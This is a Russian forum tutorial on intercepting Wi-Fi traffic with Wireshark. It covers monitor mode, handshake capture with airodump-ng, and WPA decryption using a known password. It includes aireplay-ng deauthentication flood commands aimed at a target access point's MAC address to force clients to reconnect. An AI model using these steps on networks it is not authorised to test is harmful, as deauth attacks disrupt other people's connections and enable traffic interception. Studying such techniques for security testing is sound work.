Захват трафика Wi-Fi сети

CatCash · 11 фев 2023

Доброго времени суток!

Как и сказано в шапке, речь пойдет о перехвате трафика Wi-Fi сети. Для перехвата будем использовать утилиту Wireshark которя является абсолютно бесплатной и довльно удобной в использовании, так же стоит сказать что Windows не подходит для работы с Wireshark ибо это тот еще гемор. Рекомендую использовать такие ОС как Linux, Kali Linux, Parrot Security, кстати в Parrot Security и Kali Linux Wireshark предустановлен. Не будем тянуть, преступим.
Для начала нам стоит включить режим мониторинга Wi-Fi адаптера. Этот режим нужен для того чтобы видеть весь трафик.
Ниже предоставлены спойлеры, в которых описаны команды активации мониторинга для следующих ОС:
В Parrot Security команда будет выглядеть так:
$sudo airmon-ng start wlan0

Код
$sudo airmon-ng start wlan0
Вводим пароль (или нет, получаем такое окошко, готово
Для Kali Linux команда активации режима мониторинга выглядит следующим образом:
root@kali:~#ifconfig wlan0 down && iwconfig wlan0 mode monitor && ifconfig wlan0 up

Код
root@kali:~#ifconfig wlan0 down && iwconfig wlan0 mode monitor && ifconfig wlan0 up
Далее проверяем переключилась ли карта в режим мониторинга с помощью команды:
root@kali:~#iwconfig

Код
root@kali:~#iwconfig
Получаем такое сообщение:
При запуске утилиты мы видим следующее:

Выбираем нужный нам режим захвата, в нашем случае кликаем на wlan0mon

После запуска сразу же начнеться захват пакетов, пока остановим нажав на красный квадрат в левом верхем углу.

В целом интерфейс программы интуитивно понятен, сразу приступим к необходимым настройкам.

Для большего удобства использования утилиты добавим несколько столбцов для этого перейдем в Edit -> Preferences -> Appearance -> Columns, далее нажимаем на плюс, в разделе Title пишем Channel, Type Custom, Fields wlan.radio.channel, Теперь в отдельной колонке нам будет
показывать канал, в котором перехвачен пакет. Создадим еще 1 колонку, Title Signal Stranght, Type Custom, Fields wlan_radio.signal_dbm. Эта колонка будет показывать мощность сигнала в канале в момент перехвата пакета.
Не секрет что пакеты приходят зашифрованными, и для удобной роботы с ними требуеться выполнить 3 пункта:

Расшифровать

Преоброзавать в понятный для вас вид

Проанализировать полученные данные

Для расшифроки нам понадобиться перехватить "четырёхэтапное рукопожатие". Смотрим спойлеры ниже
Зная канал выбранной точки доступа прописываем команду:
$sudo airodump-ng wlan0mon --channel 11 --write cheklist

Код
$sudo airodump-ng wlan0mon --channel 11 --write cheklist
где write, это указание на файл в который будет сохранятся захваченый трафик.
После требуется переподключение выбранной точки доступа для захвата рукопожатий, ждать мы не будем, инициируем переподключение вручную с помощью следующей команды:
$sudo aireplay-ng --deauth 100 -a 20:25:64:16:58:8C wlan0mon

Код
$sudo aireplay-ng --deauth 100 -a 20:25:64:16:58:8C wlan0mon
где deauth, это количество отправленных пакетов, -a 20:25:64:16:58:8C это MAC-адрес целевой точки доступа.
После вышеперечисленных действий, при успешном захвате рукопожатий мы получим надпись WPA handshake: 20:25:64:16:58:8C.
Вводим команду для просмотра точек доступа:
airodump-ng wlan0mon

Код
airodump-ng wlan0mon
Далее смотрим канал и прописываем соответствующую команду:
airodump-ng wlan0mon --channel 1 -w cap2

Код
airodump-ng wlan0mon --channel 1 -w cap2
После ключа -w идёт префикс файла cap2 (это имя без расширения). В этот файл будет записано захваченное рукопожатие.
Далее для перехвата трафика нужно ждать переподключения к сети выбранного устройства, но мы ждать не любим поэтому мы поможем ему переподключиться с помощью команды
aireplay-ng -0 5 -a 20:25:64:16:58:8C wlan0mon

Код
aireplay-ng -0 5 -a 20:25:64:16:58:8C wlan0mon
Здесь -0 означает деаутентификация, 5 означает количество отправленных пакетов, -a 20:25:64:16:58:8C это MAC-адрес целевой точки доступа.
После вышеперечисленных действий, при успешном захвате рукопожатий мы получим надпись WPA handshake: 20:25:64:16:58:8C.
После успешного захвата рукопожатий проверяем все ли в порядке, открываем Wireshark и в tool-bar прописываем eapol
После чего вы должны увидеть следующее:

Когда мы убедилисись что рукопожатия у нас, стоит сделать следующее перейдем в Edit -> Preferences -> Protocols -> IEEE 802.11. После чего стоит убедиться что стоит галочка в поле Enable decryption. Далее нажимаем Edit в поле Decryption keys, в появившемся окне нажимаем на плюс, выбираем wpa-pwd и в колонке Key прописываем пароль от Wi-Fi сети. После этих действий захваченый трафик преобретает более понятный вид, и с этими данными уже можно работать. Все вышесказанное на примере скриншотов в программе:

После того как вы перехватили достаточное для вас количество трафика, останавливаете захват нажимаете file -> save, если вы нажимали это несколько раз то стоит объединить файлы с трафиком в один для удобства, чтобы это сделать нажимаем file ->Merge

Вывод: Таким образом, я показал на практике, использование утилиты Wireshark на примере двух ОС. Выше я описал азы работы с программой, так же если будет интерес к этой теме дополню пунктом "ключевые слова/команды" для поиска конкретной информации. Всем спасибо!
P. S. извеняюсь за качество изображений